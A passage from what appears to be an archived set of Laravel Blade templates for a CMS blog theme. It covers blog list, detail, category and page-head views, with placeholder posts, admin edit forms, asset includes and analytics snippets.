($item) </div> <div class="row mt-5"> <div class="col-xl-12"> <div class="easier-pagination-container"> {{ $blogs_paginate_style->links() }} </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Design</span></a> </div> <h5> <a href="#"> How To Create A Design Brief </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Design</span></a> </div> <h5> <a href="#"> Work On The Latest UI Design Models </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Design</span></a> </div> <h5> <a href="#"> The Golden Rule Between Unique Design </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Wordpress</span></a> </div> <h5> <a href="#"> How to set up a Wordpress website ? </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Laravel</span></a> </div> <h5> <a href="#"> Creating projects in Laravel 8 </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Wordpress</span></a> </div> <h5> <a href="#"> How to create custom post type ? </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> </div> @endif @endif </section> <!--// Blog Section End //--> @if(Auth::user()) @can('blog check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.index"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"><i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }}</button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"><i class="fa fa-plus text-white"></i> {{ __('content.add_blog') }}</button> </form> </div> </div> @endcan @endif ����������������������������������������������������������������������������������views/frontend/blog/blog-detail-show.blade.php������������������������������������������������������0000644�����������������00000040624�14765366572�0015416 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!--// Blog Sidebar Section Start //--> <section class="section padding-minus-90" id="blog-sidebar-page"> <div class="container"> <div class="row"> <div class="col-lg-8"> @if(Auth::user()) @can('blog check') <div class="easier-mode"> @if(Auth::user()) @can('blog check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="easier-section-area"> @endcan @endif @isset ($blog) <div class="blog-post-single"> @if (!empty($blog->section_image_2)) <div class="blog-post-img"> <img src="{{ asset('uploads/img/blog/'.$blog->section_image_2) }}" alt="Blog Post Image" class="img-fluid"> </div> @endif <div class="blog-text"> <h4>{{ $blog->title }}</h4> <div class="author-meta"> <a href="#"><span class="far fa-calendar-alt"></span>{{ Carbon\Carbon::parse($blog->created_at)->isoFormat('DD') }} {{ Carbon\Carbon::parse($blog->created_at)->isoFormat('MMMM') }} {{ Carbon\Carbon::parse($blog->created_at)->isoFormat('GGGG') }}</a> <a href="#"><span class="far fa-bookmark"></span>{{ $blog->category_name }}</a> </div> <p>@php echo html_entity_decode($blog->description); @endphp</p> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="blog-post-single"> <div class="blog-post-img"> <img src="{{ asset('uploads/img/dummy/800x600.jpg') }}" alt="Blog Post Image" class="img-fluid"> </div> <div class="blog-text"> <h4>Creating projects in Laravel 11</h4> <div class="author-meta"> <a href="#"><span class="far fa-user"></span>By Admin</a> <a href="#"><span class="far fa-calendar-alt"></span>17 Auqust 2024</a> </div> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English. Many desktop publishing packages and web page editors now use Lorem Ipsum as their default model text, and a search for 'lorem ipsum' will uncover many web sites still in their infancy. Various versions have evolved over the years, sometimes by accident, sometimes on purpose (injected humour and the like). </p> <blockquote> <q> The standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham. </q> </blockquote> <div class="row"> <div class="col-md-6 col-sm-6 grid-gallery-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Blog Grid image" class="img-fluid"> </div> <div class="col-md-6 col-sm-6 grid-gallery-item"> <img src="{{ asset('uploads/img/dummy/600x600.jpg') }}" alt="Blog Grid image" class="img-fluid"> </div> </div> <h5>List Item</h5> <ul> <li>Lorem Ipsum is simply dummy text of the printing </li> <li>When an unknown printer took a galley of type</li> <li>And scrambled it to make a type specimen book. </li> <li>It was popularised in the 1960s with the</li> <li>Letraset sheets containing Lorem Ipsum passages</li> </ul> <p> Many desktop publishing packages and web page editors now use Lorem Ipsum as their default model text, and a search for 'lorem ipsum' will uncover many web sites still in their infancy. Various versions have evolved over the years, sometimes by accident, sometimes on purpose (injected humour and the like). </p> </div> </div> @endif @endisset @if(Auth::user()) @can('blog check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.edit"> <input type="hidden" name="style" value="{{ $blog->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_blog') }} </button> </form> </div> </div> @endcan @endif </div> <div class="col-lg-4"> <div class="widget-sidebar"> <div class="sidebar-widgets"> <h5 class="inner-header-title">{{ __('frontend.search') }}</h5> <form action="{{ route('default-blog-search-index') }}" method="POST"> @csrf <div class="blog-search-bar position-relative"> <input type="search" name="search" placeholder="{{ __('frontend.type_to_search') }}" class="search-form-control" required> <button type="submit" class="blog-search-btn"><span class="fa fa-search"></span></button> </div> </form> </div> @if(Auth::user()) @can('blog check') <div class="easier-mode"> @if(Auth::user()) @can('blog check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="easier-section-area"> @endcan @endif <div class="sidebar-widgets"> <h5 class="inner-header-title">{{ __('content.categories') }}</h5> <ul class="sidebar-category-list clearfix"> @foreach ($blog_count_categories as $blog_count_category) @if (isset($blog_count_category->category->category_slug)) <li class="@if ($blog_count_category->category->category_name == $blog->category_name) active @endif"><a href="{{ route('default-blog-category-index', $blog_count_category->category->category_slug) }}">{{$blog_count_category->category->category_name }} <span class="category-count">({{ $blog_count_category->category_count }})</span></a></li> @endif @endforeach </ul> </div> @if(Auth::user()) @can('blog check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="category.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2"> <i class="fa fa-edit text-white"></i> {{ __('content.add_category') }} </button> </form> </div> </div> @endcan @endif @if (is_countable($recent_posts) && count($recent_posts) > 0) <div class="sidebar-widgets"> <h5 class="inner-header-title">{{ __('frontend.recent_blogs') }}</h5> @foreach ($recent_posts as $item) <div class="recent-post-item clearfix"> <div class="recent-post-img mr-3"> <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}"> @if (!empty($item->section_image)) <img src="{{ asset('uploads/img/blog/thumbnail/'.$item->section_image) }}" class="img-fluid image-size-100" alt="blog image"> @else <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" class="img-fluid image-size-100" alt="blog image"> @endif </a> </div> <div class="recent-post-body"> <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}"> <h6 class="recent-post-title">{{ $item->title }}</h6> </a> <p class="recent-post-date"><i class="far fa-calendar-alt"></i>{{ Carbon\Carbon::parse($item->created_at)->isoFormat('DD') }} {{ Carbon\Carbon::parse($item->created_at)->isoFormat('MMMM') }} {{ Carbon\Carbon::parse($item->created_at)->isoFormat('GGGG') }}</p> </div> </div> @endforeach @unset ($item) </div> @endif <div class="sidebar-widgets"> <h5 class="inner-header-title">{{ __('frontend.copy_link_and_share') }}</h5> <ul class="sidebar-share clearfix"> <li> <div style="display: none;" id="hiddenURLDiv"></div> <a href="#" onclick="copyPageURL(); return false;"><i class="fa fa-link fa-facebook-f"></i></a> </li> </ul> </div> @if (!empty($blog->tag)) @php $str = $blog->tag; $array_tags = explode(",",$str); @endphp <div class="sidebar-widgets tag-widgets"> <h5 class="inner-header-title">{{ __('frontend.tags') }}</h5> <ul class="sidebar-tags clearfix"> @foreach ($array_tags as $tag) @if (!empty($blog_tag_index->page_uri)) <li><a href="{{ url($blog_tag_index->page_uri.'/'.$tag) }}">{{ $tag }}</a></li> @else <li><a href="{{ route('default-blog-tag-index', $tag) }}">{{ $tag }}</a></li> @endif @endforeach @unset ($tag) </ul> </div> @endif </div> </div> </div> </div> </section> <!--// Blog Grid Sidebar End //--> ������������������������������������������������������������������������������������������������������������views/frontend/blog/category-index-list.blade.php���������������������������������������������������0000644�����������������00000050121�14765366572�0016141 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('blog check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Blog Section Start //--> <section class="section" id="blog"> <div class="container"> @if(Auth::user()) @can('blog check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row"> <div class="col-md-12"> @if (is_countable($blog_count_categories) && count($blog_count_categories) > 0) <div class="text-center mb-5 custom-category-link"> <a href="{{ url($blog_index->page_uri) }}" class="mb-2">{{ __('frontend.all_blogs') }}</a> @foreach ($blog_count_categories as $blog_count_category) @if (isset($blog_count_category->category->category_slug)) <a class="@if ($category->category_name == $blog_count_category->category->category_name) current @endif mb-2" href="{{ route('default-blog-category-index', $blog_count_category->category->category_slug) }}">{{$blog_count_category->category->category_name }} ({{ $blog_count_category->category_count }})</a> @endif @endforeach @unset ($blog_count_category) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="text-center mb-5 custom-category-link"> <a href="#" class="link-dark">Creative</a> <a href="#" class="link-secondary">Business</a> <a href="#" class="link-secondary">UI / UX Design</a> <a href="#" class="link-secondary">Marketing</a> </div> @endif @endif </div> </div> @if (is_countable($blogs_paginate_style) && count($blogs_paginate_style) > 0) <div class="row"> @foreach ($blogs_paginate_style as $item) <div class="col-lg-4 col-md-6"> @if(Auth::user()) @can('blog check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="blog-item"> @if (!empty($item->section_image)) <div class="blog-img"> <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}"> <img src="{{ asset('uploads/img/blog/thumbnail/'.$item->section_image) }}" alt="Blog image" class="img-fluid"> </a> </div> @else <div class="blog-img"> <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> @endif <div class="blog-body"> <div class="blog-meta"> <a href="#"> <span><i class="far fa-user"></i>@if ($item->type == "with_this_account") {{ $item->author_name }} @else {{ __('frontend.anonymous') }} @endif</span> </a> <a href="#"> <span><i class="far fa-bookmark"></i>{{ $item->category_name }}</span> </a> </div> <h5> <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}">{{ $item->title }}</a> </h5> @if (!empty($item->short_description)) <p>{{ $item->short_description }}</p> @endif <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}" class="blog-link"> {{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> @endforeach @unset ($item) </div> <div class="row mt-5"> <div class="col-xl-12"> <div class="easier-pagination-container"> {{ $blogs_paginate_style->links() }} </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Design</span></a> </div> <h5> <a href="#"> How To Create A Design Brief </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Design</span></a> </div> <h5> <a href="#"> Work On The Latest UI Design Models </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Design</span></a> </div> <h5> <a href="#"> The Golden Rule Between Unique Design </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Wordpress</span></a> </div> <h5> <a href="#"> How to set up a Wordpress website ? </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Laravel</span></a> </div> <h5> <a href="#"> Creating projects in Laravel 8 </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Wordpress</span></a> </div> <h5> <a href="#"> How to create custom post type ? </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> </div> @endif @endif </section> <!--// Blog Section End //--> @if(Auth::user()) @can('blog check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.index"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-plus text-white"></i> {{ __('content.add_blog') }} </button> </form> </div> </div> @endcan @endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/blog/category-index.blade.php��������������������������������������������������������0000644�����������������00000024707�14765366572�0015203 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html dir="@if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) {{ __('rtl') }} @else {{ __('ltr') }} @endif @else {{ __('ltr') }} @endif" lang="@if (session()->has('language_code_from_dropdown')){{ str_replace('_', '-', session()->get('language_code_from_dropdown')) }}@else{{ str_replace('_', '-', $language->language_code) }}@endif"> <head> <!-- Meta Tags --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="title" content="@if (!empty($category->category_name)) {{ $category->category_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta name="description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta name="keywords" content="@if (!empty($page_builder->meta_keyword)) {{ $page_builder->meta_keyword }} @elseif (isset($seo)){{ $seo->meta_keyword }} @endif"> <meta name="author" content="elsecolor"> <meta property="fb:app_id" content="@if (isset($seo)){{ $seo->fb_app_id }} @endif"> <meta property="og:title" content="@if (!empty($category->category_name)) {{ $category->category_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="og:url" content="@if (isset($seo) || isset($page_builder)){{ url()->current() }} @endif"> <meta property="og:description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <meta property="og:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta itemprop="image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="og:type" content="website"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:image" content="@if (!empty($favicon->favicon_image)){{ asset('uploads/img/general/'.$favicon->favicon_image) }} @endif"> <meta property="twitter:title" content="@if (!empty($category->category_name)) {{ $category->category_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)){{ $seo->meta_title }} @endif"> <meta property="twitter:description" content="@if (!empty($page_builder->meta_description)) {{ $page_builder->meta_description }} @elseif (isset($seo)){{ $seo->meta_description }} @endif"> <!-- CSRF Token --> <meta name="csrf-token" content="{{ csrf_token() }}"> <!-- Title --> <title>@if (!empty($category->category_name)) {{ $category->category_name }} @elseif (!empty($page_builder->meta_title)) {{ $page_builder->meta_title }} @elseif (isset($seo)) {{ $seo->meta_title }} @endif</title> @if (!empty($favicon->favicon_image)) <!-- Favicon --> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" sizes="128x128" rel="shortcut icon" /> @else <!-- Favicon --> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" type="image/x-icon" /> <link href="{{ asset('uploads/img/dummy/favicon.png') }}" sizes="128x128" rel="shortcut icon" /> @endif <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> @isset ($font) <!-- Google Fonts --> <link href="{{ $font->text_font_link }}" rel="stylesheet"> <link href="{{ $font->title_font_link }}" rel="stylesheet"> @else <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;0,700;0,900;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800&display=swap" rel="stylesheet"> @endisset <!--// Boostrap v5 //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/bootstrap.min.css') }}"> <!--// Magnific Popup //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/magnific.popup.min.css') }}"> <!--// Animate Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/animate.min.css') }}"> <!--// Vegas Slider Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/vegas.slider.min.css') }}"> <!--// Owl Carousel //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.min.css') }}"> <!--// Owl Carousel Default //--> <link rel="stylesheet" href="{{ asset('assets/frontend/vendor/css/owl.carousel.default.min.css') }}"> <!--// Font Awesome //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/font_awesome/css/all.css') }}"> <!--// Flat Icons //--> <link rel="stylesheet" href="{{ asset('assets/frontend/fonts/flat_icons/flaticon.css') }}"> <style> :root { @isset ($color_option) @if ($color_option->color_option != 0) --main-color: {{ $color_option->main_color }}; --secondary-color: {{ $color_option->secondary_color }}; --scroll-button-color: {{ $color_option->scroll_button_color }}; --bottom-button-color: {{ $color_option->bottom_button_color }}; --bottom-button-hover-color: {{ $color_option->bottom_button_hover_color }}; --side-button-color: {{ $color_option->side_button_color }}; @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endif @else --main-color: #ff4500; --secondary-color: #171718; --scroll-button-color: #00baa3; --bottom-button-color: #212529; --bottom-button-hover-color: #333; --side-button-color: #25d366; @endisset @isset ($font) --title-font:@php echo html_entity_decode($font->title_font_family); @endphp; --text-font: @php echo html_entity_decode($font->text_font_family); @endphp; @else --title-font: 'Poppins', sans-serif; --text-font: 'Roboto', sans-serif; @endisset } </style> <!--// Theme Main Css //--> <link rel="stylesheet" href="{{ asset('assets/frontend/css/style.css') }}"> <!--// Theme Color Css //--> <!-- helper style css file --> <link rel="stylesheet" href="{{ asset('assets/frontend/css/helper-style.css') }}"> <style> #counters { background-image: url({{ asset('uploads/img/dummy/bg/counter-bg.png') }}); } </style> @if (isset($google_analytic)) <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id={{ $google_analytic->google_analytic }}"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', '{{ $google_analytic->google_analytic }}'); </script> @endif @livewireStyles </head> <body data-bs-spy="scroll" data-bs-target="#fixedNavbar" @if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) class="rtl-mode" @endif @elseif (isset($language)) @if ($language->direction == 1) class="rtl-mode" @endif @endif > <!--// Page Wrapper Start //--> <div class="page-wrapper" id="wrapper"> @include('frontend.sections.header.header-style1') <!--// Main Area Start //--> <main class="main-area"> @include('frontend.sections.breadcrumb.breadcrumb-style1') @include('frontend.blog.category-index-list') @include('frontend.sections.footer.footer-style1') </main> <!--// Main Area End //--> <a href="#" class="scroll-top-btn" data-scroll-goto="1"> <i class="fa fa-arrow-up"></i> </a> <!--// .scroll-top-btn // --> @include('frontend.sections.preloader.preloader') </div> <!--// Page Wrapper End //--> @include('frontend.sections.widget.bottom-style1') @include('frontend.sections.widget.side-style1') <!--// JQuery //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.min.js') }}"></script> <!--// Bootstrap //--> <script src="{{ asset('assets/frontend/vendor/js/bootstrap.min.js') }}"></script> <!--// Images Loaded Js //--> <script src="{{ asset('assets/frontend/vendor/js/images.loaded.min.js') }}"></script> <!--// Wow Js //--> <script src="{{ asset('assets/frontend/vendor/js/wow.min.js') }}"></script> <!--// Magnific Popup //--> <script src="{{ asset('assets/frontend/vendor/js/magnific.popup.min.js') }}"></script> <!--// Waypoint Js //--> <script src="{{ asset('assets/frontend/vendor/js/waypoint.min.js') }}"></script> <!--// Counter Up Js //--> <script src="{{ asset('assets/frontend/vendor/js/counter.up.min.js') }}"></script> <!--// JQuery Easing Functions //--> <script src="{{ asset('assets/frontend/vendor/js/jquery.easing.min.js') }}"></script> <!--// Owl Carousel //--> <script src="{{ asset('assets/frontend/vendor/js/owl.carousel.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/validate.min.js') }}"></script> <!--// Form Validate //--> <script src="{{ asset('assets/frontend/vendor/js/custom.select.plugin.js') }}"></script> <!--// Scroll It //--> <script src="{{ asset('assets/frontend/vendor/js/scrollit.min.js') }}"></script> <!--// Isotope Js //--> <script src="{{ asset('assets/frontend/vendor/js/isotope.min.js') }}"></script> <!--// Main Js //--> <script src="{{ asset('assets/frontend/js/main.js') }}"></script> @isset ($tawk_to) <script> @php echo html_entity_decode($tawk_to->tawk_to); @endphp </script> @endisset @livewireScripts </body> </html> ���������������������������������������������������������views/frontend/blog/show.blade.php������������������������������������������������������������������0000644�����������������00000025174�14765366572�0013240 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<!DOCTYPE html> <html dir="@if (session()->has('language_direction_from_dropdown')) @if(session()->get('language_direction_from_dropdown') == 1) {{ __('rtl') }} @else {{ __('ltr') }} @endif @else {{ __('ltr') }} @endif" lang="@if (session()->has('language_code_from_dropdown')){{ str_replace('_', '-', session()->get('language_code_from_dropdown')) }}@else{{ str_replace('_', '-', $language->language_code) }}@endif"> <head> <!-- Meta Tags --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> <meta name="title" content="@if (!empty($blog->title)) {{ 